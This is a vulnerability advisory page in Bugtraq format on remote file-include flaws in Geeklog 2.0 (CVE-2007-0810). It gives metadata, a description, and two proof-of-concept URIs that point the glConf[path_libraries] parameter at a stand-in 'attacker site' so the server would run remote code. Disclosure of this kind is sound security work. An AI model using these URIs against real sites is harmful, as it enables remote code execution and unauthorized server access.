Geeklog Multiple Remote File Include Vulnerabilities
BID:22386
Info
Geeklog Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 22386 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-0810 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 05 2007 12:00AM |
| Updated: | May 12 2015 07:34PM |
| Credit: | GolD_M is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Geeklog Geeklog 2.0 |
| Not Vulnerable: | |
Discussion
Geeklog Multiple Remote File Include Vulnerabilities
Geeklog is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Geeklog 2.0 and previous versions are vulnerable to these issues.
Geeklog is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Geeklog 2.0 and previous versions are vulnerable to these issues.
Exploit / POC
Geeklog Multiple Remote File Include Vulnerabilities
An attacker may exploit these issues using a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/Geeklog/MVCnPHP/BaseView.php?glConf[path_libraries]=attacker site
http://www.example.com/[path]/Geeklog/MVCnPHP/ViewInterface.php?glConf[path_libraries]=attacker site
An attacker may exploit these issues using a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/Geeklog/MVCnPHP/BaseView.php?glConf[path_libraries]=attacker site
http://www.example.com/[path]/Geeklog/MVCnPHP/ViewInterface.php?glConf[path_libraries]=attacker site